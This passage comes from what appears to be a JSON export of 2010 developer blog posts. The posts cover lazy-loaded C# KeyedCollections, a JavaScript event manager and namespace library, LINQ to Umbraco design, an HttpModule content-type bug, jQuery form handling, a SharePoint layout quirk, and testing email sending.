You’ll notice that KeyedCollection actually is KeyedCollection<Id, Lazy<T>>, which is wrapping our generic argument into the Lazy object.\nAs I mentioned above we need to implement a method which tells it how we’re going to get the key from the object (our Entity), so let’s implement that:\nprotected override Id GetKeyForItem(Lazy<T> item) { //access the real item from the lazy object return item.Value.Id; } So here’s how the collection object will determine what is the key is for each item. But we’re after something that’s happening in a lazy fashion, so let’s write a little application to use it and we’ll make sure that it is lazy like we expect:\nclass Program { static void Main(string[] args) { var range = Enumerable.Range(0, 10); var lkc = new LazyKeyedCollection<Entity>(); foreach (var item in range) { var i = item; Console.WriteLine("Adding item " + i + " to LazyKeyedCollection"); lkc.Add(new Lazy<Entity>(() => { var e = new Entity(); e.Id = new Id { Alias = i.ToString(), Name = "LazyKeyedCollection item " + i }; e.CreatedDate = DateTime.Now; Console.WriteLine("Created entity '" + e.Id.Name + "'"); return e; })); } } } Adding item 0 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 0’\nAdding item 1 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 1’\nAdding item 2 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 2’\nAdding item 3 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 3’\nAdding item 4 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 4’\nAdding item 5 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 5’\nAdding item 6 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 6’\nAdding item 7 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 7’\nAdding item 8 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 8’\nAdding item 9 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 9’\nOh crap, look at that, we’re evaluating the lambda expression way to early, in fact it’s happening as soon as we add the item into the collection. That doesn’t sound very lazy now does it?\nSo why did this happen? Well the problem is the GetKeyForItem method. Because we have to tell the collection how to find the key it has to create the object before it can resolve the key! Well shit, that’s not good, we’re completely missing the point of creating a lazy collection.\nThis is where I got tripped up in my implementation, so I needed to find another way around what I was doing…\nGetting Lazier We’ve got a problem, we need to know the ID of the object, but we don’t want to create the object. 
So how to do this… We’ll do a different implementation of our lazy collection:\nclass LazyKeyedCollectionMark2<T> : KeyedCollection<Id, KeyValuePair<Id, Lazy<T>>> where T : Entity { protected override Id GetKeyForItem(KeyValuePair<Id, Lazy<T>> item) { throw new NotImplementedException(); } } There’s a very subtle change in this implementation, now the value type argument of the KeyedCollection is no longer just Lazy<T> but instead it is KeyValuePair<Id, Lazy<T>> and this means that our implementation of GetKeyForItem is refactored to look like this:\nprotected override Id GetKeyForItem(KeyValuePair<Id, Lazy<T>> item) { return item.Key; } Well now our item object already knows about the key without having to request it from our lazy object, so this should be nice and easy to work with, let’s add test it to make sure that we’re really lazy with this new code:\nvar lkcm2 = new LazyKeyedCollectionMark2<Entity>(); foreach (var item in range) { var i = item; Console.WriteLine("Adding item " + i + " to LazyKeyedCollectionMark2"); Id id = new Id { Alias = i.ToString(), Name = "LazyKeyedCollectionMark2 item " + i }; lkcm2.Add(new KeyValuePair<Id, Lazy<Entity>>(id, new Lazy<Entity>(() => { var e = new Entity(); e.Id = id; e.CreatedDate = DateTime.Now; Console.WriteLine("Created entity '" + e.Id.Name + "'"); return e; }))); } And what does it output:\nAdding item 0 to LazyKeyedCollectionMark2\nAdding item 1 to LazyKeyedCollectionMark2\nAdding item 2 to LazyKeyedCollectionMark2\nAdding item 3 to LazyKeyedCollectionMark2\nAdding item 4 to LazyKeyedCollectionMark2\nAdding item 5 to LazyKeyedCollectionMark2\nAdding item 6 to LazyKeyedCollectionMark2\nAdding item 7 to LazyKeyedCollectionMark2\nAdding item 8 to LazyKeyedCollectionMark2\nAdding item 9 to LazyKeyedCollectionMark2\nFantastic! We’re not creating the object when we’re adding it to the collection, and that’s what we wanted to see. Now let’s test iterating through the collection, and just output the CreatedDate property:\nforeach (var item in lkcm2) { Console.WriteLine(item.Value.Value.CreatedDate.ToString("hh:mm:ss.ffffzzz")); } Eww, that’s ugly, cuz we’re getting back a KeyValuePair object we have to grab out the through the Value property, and then cuz we’ve still got our Lazy<T> object we have access its Value property. This has really added some code-smell back in so let’s see if we can clean it up a bit. We’ll override the GetEnumerator of our collection:\npublic new IEnumerator<T> GetEnumerator() { foreach (var item in this.Dictionary.Values) yield return item.Value.Value; } Now we’ll be getting back the actual instance of T rather than our double-wrapped version of it. 
Now our foreach looks like this:\nforeach (var item in lkcm2) { Console.WriteLine(item.CreatedDate.ToString("hh:mm:ss.ffffzzz")); } And the result looks like this:\nCreated entity ‘LazyKeyedCollectionMark2 item 0’\n09:23:59.1277+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 1’\n09:23:59.1807+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 2’\n09:23:59.1827+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 3’\n09:23:59.1847+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 4’\n09:23:59.1857+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 5’\n09:23:59.1877+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 6’\n09:23:59.1887+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 7’\n09:23:59.1907+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 8’\n09:23:59.1907+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 9’\n09:23:59.1927+10:00\nAnd you can see from the time stamp we’re not creating each object until it’s requested from the collection. This means that if we were to grab a subset we’d not have some of the created at all!\nConclusion Here we’ve looked at how to use the KeyedCollection and Lazy<T> to create a lazy loaded collection which we can work with, and how we can ensure that the collection items are lazy loaded at time of enumeration.\nYou can grab the source from this blog post off my bitbucket.\nFootnote Although this implementation works it’s not without drawbacks. If you’re wanting to use LINQ you’ll find that it works a little bit differently, you need to have an *explicit implementation of IEnumerable<T>, so you can replace the one which is defined by the superclass. This is all the committed code.\nYou’d be much better off doing an implementation of IDictionary and IList on the same object, rather than trying to work with KeyedCollection. Because of the way the .NET framework classes implements the IEnumerable interface it’s a lot harder to get access to the methods (they aren’t virtual) so to override them you have to do your own explicit implementations of the interface and use the new keyword when you can.\n", "id": "2010-09-22-lazy-keyedcollections" }, { "title": "An EventManager in JavaScript", "url": "https://www.aaron-powell.com/posts/2010-09-12-javascript-eventmanager/", "date": "Sun, 12 Sep 2010 00:00:00 +0000", "tags": [ "javascript", "javascript-eventmanager", "web" ], "description": "Having disconnected eventing in JavaScript using a simple little framework", "content": "Overview Previously I’ve blogged about Client Event Pool’s (yes I know the images are broken), but that example was intrinsically tied to Microsoft AJAX and I wanted to have one which was separate from it.\nSo I decided to create an object that resides at slace.core.eventManager which will achieve this.\nNote: This library has a dependency on the slace.core library.\nThis API allows you to bind events, trigger events, unbind events (and event handlers) and event check if an event handler is registered.\nThis is all possible without having to explicitly tie each object to the objects which need to know about the events it’s firing. 
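As a quick illustration of that decoupling before digging into each method, here are two pieces of code that never reference each other and only share an event name (the event name and payload here are made up):

// Somewhere in one script: register interest in an event.
slace.core.eventManager.bind('cart updated', function (args) {
    console.log('Items in cart: ' + args.count);
});

// Somewhere else entirely: announce that the event has happened.
// Neither piece of code knows the other exists - only the event name is shared.
slace.core.eventManager.trigger('cart updated', { source: 'cart' }, { count: 3 });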
To fully understand the idea behind the Client Event Pool concept I suggest you read my previous article and its references.\nBinding events The concept of binding to an event is handy if you’ve got code on a page that you want to run when a certain event will be completed (although the code may also be run by other means), and to do this there is a simple method which works like this:\n1 slace.core.eventManager.bind('some event', function() { ... }); This will put that handler there so that if any code that triggers (raises) the ‘some event’ event the handler you specify will be executed.\nYou can call bind as many times as you like, adding as many handlers as you want.\nOne thing that can be handy (if you need to add/ remove events programmatically) is the ability to provide a unique ID to an event handler, to do that it’s a third argument to the bind method:\n1 slace.core.eventManager.bind('some event', function() { ... }, 'awesome-event'); This will give the identifier of ‘awesome-event’ to the function you provided (we’ll look at how this is handy shortly)\nHow it works Here’s the code that makes up bind:\n1 2 3 4 5 6 7 8 bind: function (name, fn, eventHandlerId) { var e = getEvent(name); if (!eventHandlerId) { eventHandlerId = name + '-' + (e.length + 1); } fn.id = eventHandlerId; e.push(fn); } I’ve omitted the getEvent method as it’s not important, look into the real source for it\nWhat it does is check if you gave a unique ID, and if you didn’t then I’ll create one based off of the name of the event and the position in array of handlers and then it’s assigned to the id property of the function object and adds it to the array of handlers.\nTriggering events If you’re binding to events you’re probably going to want to be raising them as well, and this is what the trigger method is for and it works similarly to .NET events, like so:\n1 slace.core.eventManager.trigger("some event"); When triggering an event you need to provide it the name of the event to trigger (eg: ‘some event’). Additionally there are two more arguments, with the full method call looking like this:\n1 slace.core.eventManager.trigger("some event", source, args); If you’ve been doing much JavaScript work you’ll be familiar with just how much fun scope can be in JavaScript, well with the trigger method, you’re able to specify what object you want to be scoped as the this object in the method when it runs. This is the 2nd argument to the trigger method.\nLastly you can pass in arguments you want for the event handlers. If your handlers are to accept multiple arguments then you need to pass in an array, but I’d suggest just passing in an object literal each time, it’s a lot more flexible than multiple arguments :P.\nThe most common reason I’ve needed to use this is to work nicely with AJAX requests, rather than having to pass in call-back methods ;).\nHow it works Here’s the code:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 trigger: function (name, source, args) { if (!source) { source = {}; } if (!args) { args = []; } var evt = getEvent(name); if (!evt || (evt.length === 0)) { return; } evt = evt.length === 1 ? 
[evt[0]] : Array.apply(null, evt); if (args.constructor !== Array) { args = [args]; } for (var i = 0, l = evt.length; i < l; i++) { evt[i].apply(source, args); } } First off I do a few things like making sure you’re passing in an object for the sender (or I’ll default it to an empty one) and some arguments (which will become an empty array if it’s not there).\nNext I get the event by name and make sure there are some handlers to run.\nIf there are some handlers it’ll just do a check to make sure that it’s an array that we’ll be working with for the handlers, ensure that the arguments are an array (if it’s not the code will break during the apply method, since you have to pass an array as the 2nd argument to it) and then we iterate through all the handlers in the order they were added, setting the scope to what was specified.\nProgrammatically playing with events In addition to bind and trigger there are two methods which are handy if you’re trying to work with events easily.\nAs I mentioned for the bind method you can pass in an ID for the event handler, well the ID can be used to remove the event:\n1 slace.core.eventManager.unbind("some event", "my-event"); What this will do is iterate through all the registered handlers and if one matches with the ID you’ve provided then it’ll remove it from the handler collection.\nIf you want to get rid of all the event handlers you can just omit the handler ID and it’ll clear all the handlers for that event.\nAnother useful feature of the eventManager is that it allows you to check if an event is already registered. If you had a named function that you want to bind to an event you should check to make sure it hasn’t already been registered, eg:\n1 slace.core.eventManager.isRegistered("some event", "my-event"); This will return true or false depending on whether the ID you’re providing matches a handler registered in that event.\nYou could use it like this:\n1 2 3 4 5 6 7 function myMethod() { ... } /* ... */ if(!slace.core.eventManager.isRegistered('some event', 'myMethod')) { slace.core.eventManager.bind('somme event', myMethod); } Sure it’s a sandboxed example but it should give you an idea.\nSource Code You can grab the full source code for the eventManager from the project on bitbucket, which is here: http://bitbucket.org/slace/javascript-tools/src/tip/JavaScriptTools/Scripts/slace.core.eventManager.js\n", "id": "2010-09-12-javascript-eventmanager" }, { "title": "Core JavaScript library", "url": "https://www.aaron-powell.com/posts/2010-09-12-slace-core-javascript-library/", "date": "Sun, 12 Sep 2010 00:00:00 +0000", "tags": [ "javascript", "web" ], "description": "A core JavaScript library from my JavaScript Tools", "content": "Overview This library is really just a core set of features which don’t really belong to any particularly category, and I find a handy for common use in all JavaScript I write.\nRegistering Namespaces Something that I do a lot of in JavaScript is create namespaces. I always like to keep all code in a single namespace in the same manner which I would do with .NET. But there is a problem, JavaScript doesn’t have namespaces!\nI’m sure everyone has written their own code to register namespaces. 
The code that I use is actually someone I worked with adapted from some code that I’d written as I thought you had to be able to use recursive functions to do it and he was just quicker to getting it written than I was :P.\nUsage The method resides within my core API namespace, slace.core as a method named registerNamespace, like so:\nslace.core.registerNamespace('some.namespace'); This will create a new namespace starting at the window object, but it also has the capabilities to add the namespace from any existing namespace, eg:\nslace.core.registerNamespace('web', slace); Now the slace object will also have web to go with core.\nUnderstanding Namespaces in JavaScript As I mentioned above JavaScript doesn’t have the concept of namespaces, so how do you create a namespace in a language which doesn’t do namespaces?\nWell namespaces in JavaScript are actually a bit of a trick, and they aren’t namespaces which are familiar to .NET developers, they are actually just a series of empty objects.\nTake this piece of code:\nslace.core.registerNamespace('slace.web.controls'); This will produce the following object:\nslace = { web = { controls = {\t} } }; Well technically the window object should be before slace but it’s skipped for brevity, as is the slace.core object\nSo this is really just a set of empty objects!\nLooking into the code So you can find the code here, and let’s have a look at what it does. The crux of it is a recursive function which the namespace is passed into:\nslace.core.registerNamespace = function (namespace, global) { var go; go = function (object, properties) { if (properties.length) { var propertyToDefine = properties.shift(); if (typeof object[propertyToDefine] === 'undefined') { object[propertyToDefine] = {}; } go(object[propertyToDefine], properties); } }; go(global || (function () { return this; })(), namespace.split('.')); } In this function the argument object is what we’re putting the namespace onto, with properties is an array of the namespace to define (having been split on the .).\nThe last line initiates the function and either passes in the object you want to augment, or the object which is scoped as this for the method (which will be window unless you’re really going to get nasty with JavaScript, but that’s a topic for another time :P).\nFun fact This code can actually be reduced by a few lines by making it a self-executing named function (or a self-executing anonymous function if you want ;)), but due to limitations in the Visual Studio 2010 JavaScript intellisense engine it doesn’t work recursively it seems. Odd bug, but easy to get around (and it makes your code a bit more readable!).\nBase Extensions The library also includes some handy extensions for detecting if a method already registered on an object, in the form of Function.method (which is from Douglas Crockford’s article on JavaScript Inheritance), and the Array.prototype is also augmented to have Array.contains, Array.remove and Array.indexOf (unless it’s already there).\n", "id": "2010-09-12-slace-core-javascript-library" }, { "title": "JavaScript Tools", "url": "https://www.aaron-powell.com/posts/2010-09-12-javascript-tools/", "date": "Sun, 12 Sep 2010 00:00:00 +0000", "tags": [ "javascript" ], "description": "The home of JavaScript tools I have produced", "content": "Overview I’ve been doing a lot of JavaScript development of recent, and I’ve always had a soft spot of JavaScript so it was only natural that I keep doing the same things over and over again. 
As I found that I was doing similar tasks continuously I decided to start working on my own little JavaScript toolbox.\nAnd since I’m doing these things again and again I thought it would be likely that there is at least one person out there who is doing it as well, so I decided that I would release the toolkit I’ve been building for free.\nSo this is the landing page for the different articles around the different libraries in my JavaScript Tools.\nComponents Core library EventManager Unit Testing (Coming soon!) Source Code I’ve decided to release the source code for this as open source. It’s hosted using Mercurial on my BitBucket account. You can grab it here http://hg.slace.biz/javascript-tools and feel free to use it, fork it or contribute to it :).\nLicence I’ve decided to license the JavaScript tools under the MIT license: http://bitbucket.org/slace/javascript-tools/src/tip/JavaScriptTools/LICENSE.txt\n", "id": "2010-09-12-javascript-tools" }, { "title": "Why no IQueryable in LINQ to Umbraco?", "url": "https://www.aaron-powell.com/posts/2010-09-06-iqueryable-linq-to-umbraco/", "date": "Mon, 06 Sep 2010 00:00:00 +0000", "tags": [ "umbraco", "linqtoumbraco" ], "description": "Why does LINQ to Umbraco not implement the IQueryable interface?", "content": "In the theme of blogs answering questions which aren’t being asked I thought I would have a bit of a look at why LINQ to Umbraco isn’t an IQueryable-based LINQ implementation.\nWith a previous article I covered Understanding LINQ to Umbraco, but the topic of IQueryable wasn’t in it, partially because it’s an involved topic.\nSo let’s have a look at why LINQ to Umbraco isn’t using IQueryable.\n##Understanding IQueryable\nTo understand why we’re not using IQueryable we need to have a bit of an understanding of IQueryable. IQueryable is a super-set of IEnumerable, allowing you to inspect the query that is being written and transform it into your underlying query language.\nThis is why it is good for something like LINQ to SQL or Entity Framework. You can take the strongly typed version of the query (expression tree), generated in C# or VB.Net, and then pull it apart and turn it into SQL.\nSo this is quite a handy feature if you have an underlying query language which you want to work against.\nBut this can also cause some problems if you’re not careful, and one of the biggest hurdles is performance.\nSince IQueryable requires transforming your expression tree into the “real” language, executing it and then turning the resulting dataset back into the .Net types required, you can lose a bit in performance. You can’t not have performance drawbacks from this.\n##The decision in Umbraco\nSo while building LINQ to Umbraco we did analysis of what the most common use for it would be, and that would be as an alternative to the NodeFactory API. This meant working with the XML cache, and the question is would there be a benefit to IQueryable. Ultimately it turned out that the answer to that is no. With .NET 3.5 it was apparent that the LINQ to XML API was the way Microsoft was going to go for working with XML, but that had an inherent problem. LINQ to XML is actually an implementation of IEnumerable, not IQueryable. This means that implementing IQueryable in LINQ to Umbraco would mean having to translate the IQueryable queries into IEnumerable queries.\nThis isn’t that hard a task (it just requires compiling the expression tree), but you’d be losing quite a bit of performance (the short sketch below shows the difference between the two interfaces).
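To make that distinction concrete, here’s a tiny self-contained sketch (not code from LINQ to Umbraco itself) of the difference: the IQueryable side hands the provider an expression tree that can be inspected, translated or compiled, whereas the IEnumerable side has already baked the lambda into a delegate that can only be executed:

using System;
using System.Linq;
using System.Linq.Expressions;

class QueryableVsEnumerable
{
    static void Main()
    {
        var numbers = new[] { 1, 2, 3, 4, 5 };

        // IEnumerable: the lambda is compiled to a delegate up front; all you can do is run it.
        Func<int, bool> asDelegate = n => n > 2;
        Console.WriteLine(numbers.Where(asDelegate).Count());    // 3

        // IQueryable: the lambda is captured as an expression tree which a provider
        // could pull apart and translate into its own query language (as LINQ to SQL does).
        Expression<Func<int, bool>> asTree = n => n > 2;
        var query = numbers.AsQueryable().Where(asTree);

        Console.WriteLine(query.Expression);                     // the query, as inspectable data
        Console.WriteLine(asTree.Compile()(5));                  // compiling gets you back to a plain delegate
    }
}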
It was a lot quicker to work with in-memory collections, rather than trying to “lazy load” the XML into LINQ to Umbraco objects.\nIt is true though that this can have memory issues, and still have performance problems especially if you’re working a really large website. But analysis shows that the majority of sites are of a size that the performance loss of IQueryable would be less than the in-memory implementation.\n##The other problem…\nThere’s one other problem with using IQueryable, it’s a huge thing to implement. We wanted LINQ to Umbraco to be fully featured, but to achieve that you have to think about what expression tree branches are going to be covered. Take this query for example:\nvar pages = from page in ctx.TextPages where page.BodyText.Contains("Umbraco") select page; So to implement this you need to:\nLook at the type you require Find the BodyText property Look at the method invocation to string.Contains Find the argument being passed to string.Contains Select the items back into LINQ to Umbraco types And that’s just a basic query, imagine:\nJoin statements GroupBy Ordering Multi-conditional Where clauses There’s a lot of things which can be done with LINQ, and that’s not to mention handling CLR methods, simple arithmetic operators, etc. Writing a fully-fledged IQueryable provider is a big task!\n##Conclusion\nSo this was just a bit of a look as to why we didn’t go the route of IQueryable for LINQ to Umbraco.\nBut if you’re really keep, you can implement IQueryable yourself when you’re writing your own custom LINQ provider, who knows, I might even look at that at some point ;).\n", "id": "2010-09-06-iqueryable-linq-to-umbraco" }, { "title": "Using HttpCompression libraries and ASP.NET MVC FileResult", "url": "https://www.aaron-powell.com/posts/2010-08-30-http-compression-mvc-fileresult/", "date": "Mon, 30 Aug 2010 00:00:00 +0000", "tags": [ "asp.net-mvc", "clientdependency", "umbraco" ], "description": "An interesting quirk I found from ClientDe", "content": "While working on some improvements around the way the styles are handled on my blog (and so they don’t get trashed whenever I update the code with that of the main repository) I decided that I would use ClientDependency to handle this.\nIt was quite easy, I added ClientDependency in, re-configured the Views to use it and refactored the CSS so that it was possible to have my CSS along side the other CSS.\nAll was well and good until I noticed a problem, all the images on my blog were no longer working, they were coming up as broken images. That’s not good, I kind of need them… So I did a bit more investigation, all the download links were also broken. Ok, that’s really not good…\nI rolled back source control and it seemed that everything was working just fine before I added ClientDependency, but ClientDependency shouldn’t have any effect on downloads… Should it?\nSo I did some digging, I was doing everything that should have been done to return a file, hell, it was even more basic than you’d expect:\npublic virtual ActionResult Render(string path) { if (_fileRepository.IsFile(path)) { var fullPath = _fileRepository.MapPath(path); return File(fullPath, _mimeHelper.GetMimeType(fullPath)); } return Redirect("/"); } That looks fine right… right?! Yes, that is fine :P\n##Hunting for bugs\nWell it was time to start finding the problem, and I had a feeling this was going to be a doosy. 
I started by disabling ClientDependency and then the images did start working (although my CSS fell apart…), so I was 100% convinced that the problem was with it, but what could it be? I’m working with binary files here, not CSS.\nSo I crack out my debugger and start stepping through the ClientDependency source and what I first notice is that I don’t know anywhere near as much about it as I would have liked to! Eventually I find something a little bit off. Because ClientDependency runs as a HttpModule it fires for the request of the image, well that’s my first red flag. And I start worrying, if it’s pushing the image through its pipeline maybe it’s doing something it shouldn’t be.\nThe next thing I start looking for is a check of the content type, hoping that it’s ignoring the image request… but no joy.\nIn fact, that’s exactly the problem! The way ClientDependency works is that it adds a filter to the HttpResponse which processes the contents of the page and then in turn transforms it in the manner we require. The problem is, it didn’t ignore the image content type; in fact it turned it into a string, processed it and returned the original string, but now it was no longer a binary object.\nCock…\n##He’ll be making a ContentType and checking it twice\nSo this is a very obvious problem, we’re not ignoring the images, we’re treating their request as though it is any other text/plain request, so I put in a conditional check to ignore the image requests, drop it into my blog and hit refresh. But still no joy… I check again that I did put the line of code in, attach the debugger and spin it off.\nTo my surprise though the content type property of my response is not image/png as I expected it to be, but instead it’s text/plain. Err, WTF? I spin up Charles and check, nope, Charles is saying that it’s image/png in the browser. I spin up PowerShell and write a simple web request script, again it’s telling me image/png. Well why the hell is the HttpModule telling me otherwise?\n###An event by any other name…\nSo I start doing some research and realise that we’re using the event HttpApplication.PreRequestHandlerExecute to do the transform, but the fun fact is that this is too early in the request life cycle. At this point the Request object is populated, but it’s not been handled, so the Response object doesn’t have the appropriate ContentType set yet.\nAfter a bit more research I find a better event to suit my needs, HttpApplication.PostRequestHandlerExecute, and this is the one recommended when doing filters against the HttpResponse.\nNow my ContentType property is set up and I can do checking against it, and the fix now works nicely (there currently isn’t a ClientDependency release available with this fix yet, so if you need it you’ll have to grab it from the source).\n##A word of caution\nThe reason I’ve made this post is to bring this oversight to people’s attention. While doing the research to fix this problem I looked at a few different libraries which add custom filters (either to remove whitespace, or to gzip responses, etc) and I didn’t find any of them doing content type checking of the response. Generally speaking you shouldn’t need to do this, and in the past it hasn’t really been needed as it wasn’t as commonplace to have ASP.NET web applications actually return a file.
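To make the content type check concrete, here is a minimal sketch of the kind of guard a response-filtering HttpModule needs (illustrative only, not the actual ClientDependency fix; the module name is made up and the filter attachment is left as a comment):

using System;
using System.Web;

public class ContentTypeAwareFilterModule : IHttpModule
{
    public void Init(HttpApplication app)
    {
        // PostRequestHandlerExecute fires after the handler has run, so the
        // ContentType on the response has been populated by this point.
        app.PostRequestHandlerExecute += (sender, e) =>
        {
            var response = ((HttpApplication)sender).Response;

            // Only textual responses should go through a string-based filter;
            // images, downloads and other binary content are left alone.
            if (!response.ContentType.StartsWith("text/", StringComparison.OrdinalIgnoreCase))
                return;

            // response.Filter = new YourStreamBasedFilter(response.Filter);
        };
    }

    public void Dispose() { }
}

The fix described above only ignores the image content types; the broader text-only check here is just one way of generalising the same idea.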
But with the advent of MVC and the easy in which you can use FileResult it’s something to watch out for.\nThere’s nothing wrong with using HttpModule’s to compress your response, clean up your HTML or run what ever other filter you may desire, but make sure you’re using one that understands that not everything running through the ASP.NET life cycle can be handled as a string ;).\n", "id": "2010-08-30-http-compression-mvc-fileresult" }, { "title": "A LINQ observation", "url": "https://www.aaron-powell.com/posts/2010-08-28-a-linq-observation/", "date": "Sat, 28 Aug 2010 00:00:00 +0000", "tags": [ ".net", "linq" ], "description": "", "content": "Well I’m making good headway with LINQ to Umbraco, in the next few days I’ll be doing a very interesting check in (which I’ll also blog here about). My tweet-peeps already have an idea of what it entails, but there’s a bit of a problem with it still which I want to address before the commit.\nAnd that problem has lead to an observation I made about LINQ, well, about Expression-based LINQ (ie - something implementing IQueryable, so LINQ to SQL, or LINQ to Umbraco, etc).\nI’ll use LINQ to SQL for the examples as it’s more accessible to everyone.\nTake this LINQ statement (where ctx is an instance of my DataContext):\nvar items = ctx.Items; That statement returns an object of Table<Item>, which implements IQueryable<T>, IEnumerable<T> (and a bunch of others that are not important for this instructional). So it’s not executed yet, no DB query has occurred, etc. Now lets take this LINQ statement:\nvar items2 = from item in ctx.Items select item; This time I get a result of IQueryable<Item>, which implements IQueryable<T> (duh!) and IEnumerable<T> (and again, a bunch of others).\nBoth of these results have a non-public property called Expression. This reperesents the expression tree which is being used to produce our collection. But here’s the interesting part, they are not the same. That’s right, although you’re getting back basically the same result, the expression used to produce that result is really quite different.\nThis is due to the way the compiler translates the query syntax of LINQ into a lambda syntax. In reality the 2nd example is equal to this:\nvar items2 = ctx.Items.Select(item => item); But is this really a problem, what difference does it make? In the original examples you actually get back the same data every time. You’ll have slightly less overhead by using the access of Table<T> rather than IQueryable<T>, due to the fact that you’re not doing a redundant call to Select. But in reality you would not notice the call.\nThis has caused a problem for me as my direct-access lambda syntax fails my current unit test, where as the query syntax passes. Now to solve that problem! ;)\n", "id": "2010-08-28-a-linq-observation" }, { "title": "Not getting DropDownList value when setting it via JavaScript", "url": "https://www.aaron-powell.com/posts/2010-08-28-no-value-when-settings-dropdown-with-javascript/", "date": "Sat, 28 Aug 2010 00:00:00 +0000", "tags": [ "javascript" ], "description": "", "content": "So today I had a problem which was doing my head in. I had a form which has a bunch of DropDownLists on it, some of which are disabled (depending on the radio button selection). 
Regardless of whether the DropDownList was available I needed to read the value (which was often set via JavaScript) back on the server.\nBut I noticed that the value I was setting via JavaScript wasn’t making its way back to the server if I read the dropDownList.SelectedValue property. Hmm, I said to myself; I looked at the form and it was setting the value right. The “selected” attribute was on the right option tag, but the value still wasn’t on the server.\nIf I had set the value by clicking on it and selecting a value it was making it back.\nHmm…\nThen I realised the difference between the two actions: the DropDownList wasn’t enabled in one of them, and when it wasn’t enabled the value wasn’t making it back.\nShit, that’s it! When a DropDownList isn’t enabled .NET seems to disregard the submitted value when loading the ViewState!\nBut the solution is simple:\n$(document).ready(function() { $('#submitButton').click(function() { $('select').removeAttr('disabled'); }); }); jQuery makes it super easy to find all the drop down lists and then make them enabled before the form submits.\nHere’s another example of how to do it if you’re using client-side validation and you want to make sure it’s passed:\n$(document).ready(function() { $('#submitButton').click(function() { if( Page_IsValid ) $('select').removeAttr('disabled'); }); }); Page_IsValid is the client variable updated with the result of the client side validation.\n", "id": "2010-08-28-no-value-when-settings-dropdown-with-javascript" }, { "title": "SharePoint feature corrupts page layout", "url": "https://www.aaron-powell.com/posts/2010-08-28-sharepoint-feature-corrupts-page-layout/", "date": "Sat, 28 Aug 2010 00:00:00 +0000", "tags": [ "sharepoint" ], "description": "Are your SharePoint features corrupting your page layout?", "content": "Something that I’ve come across a few times when working on SharePoint/ MOSS 2007 features: when importing a Page Layout the ASPX sometimes becomes corrupt. You end up with additional HTML inserted once it’s been imported into SharePoint.\nThe corruption is in the form of HTML tags outside the last </asp:Content> tag.\nWell it turns out that the problem happens when you import an ASPX that has a </asp:content> tag. Did you notice the problem?\nThat’s right, if you have a lowercase c then it’ll import corrupted. Let me show the problem again, highlighted this time: </asp:content>\nAll you need to do is ensure that it has a capital letter, so the tag is </asp:Content>, and it’s all good again.\nThe most common cause of this happening is doing a format-document within Visual Studio on the ASPX when it is in the feature’s class-library project.
Visual Studio doesn’t handle the ASPX file correctly, and formats it as a raw XHTML file, which dictates that the XHTML tags need to be in all lowercase.\n", "id": "2010-08-28-sharepoint-feature-corrupts-page-layout" }, { "title": "Testable email sending", "url": "https://www.aaron-powell.com/posts/2010-08-28-testable-email-sending/", "date": "Sat, 28 Aug 2010 00:00:00 +0000", "tags": [ "c#", "testing" ], "description": "Creating an integration test of sending an email", "content": "Yesterday Shannon finally got with the times and learnt about the System.Net and how it can be used to dump emails to your file system.\nSomething I then mentioned to him on Twitter was that you can also use this method to test the email that was sent.\nFirst off lets write ourselves a very basic email sending test:\n[TestMethod] public void EmailSender() { var mail = new MailMessage(); mail.To.Add("example@somewhere.com"); mail.From = new MailAddress("example2@somewhere.com"); mail.Subject = "Testing Email"; mail.Body = "Sending Email. Woo!"; var smtp = new SmtpClient(); smtp.Send(mail); } So we’re assuming that we’ve set our config up so that we’re dumping the email to the file system. This is all well and good but how do we assert that the email was sent to the right person, and that the body/ subject was what we wanted? Well that can easily be done, if you know the structure of the .eml file which is generated when dumping the mail to the file system.\nI wrote a handy little class which can do this:\npublic sealed class EmlHelper { public string Path { get; set; } public string From { get; set; } public string To { get; set; } public string Subject { get; set; } public string Urls { get; set; } public EmlHelper(string path) { Path = path; string fc = new StreamReader(path).ReadToEnd(); From = Regex.Matches(fc, "From: (.+)")[0].ToString().Replace("From: ", string.Empty).Trim(); To = Regex.Matches(fc, "To: (.+)")[0].ToString().Replace("To: ", string.Empty).Trim(); Subject = Regex.Matches(fc, "Subject: (.+)")[0].ToString().Replace("Subject: ", string.Empty).Trim(); Urls = string.Empty; foreach (Match m in Regex.Matches(fc, @"https?://([a-zA-Z\\.]+)/")) { Urls += m.ToString() + ' '; } } } It’s a fairly basic class which you just need to understand the structure of the eml file, I used some regexes to break it apart. They may be a bit brittle (my regex skills aren’t crash hot) and I don’t support reading the body (as you really need to customise that for plain text vs HTML, and yeah, good luck there :P).\nNow all that we need to do is pass in the file name of the email which was generated.\nThe problem is that there isn’t really a good way to determine the email (someone know a way?), so you can just use LINQ to locate the file ordered by created date or something, but for this example I’m going to assume that there aren’t any other files in there anyway. So lets update our test method:\n[TestMethod] public void EmailSender() { var mail = new MailMessage(); mail.To.Add("example@somewhere.com"); mail.From = new MailAddress("example2@somewhere.com"); mail.Subject = "Testing Email"; mail.Body = "Sending Email. 
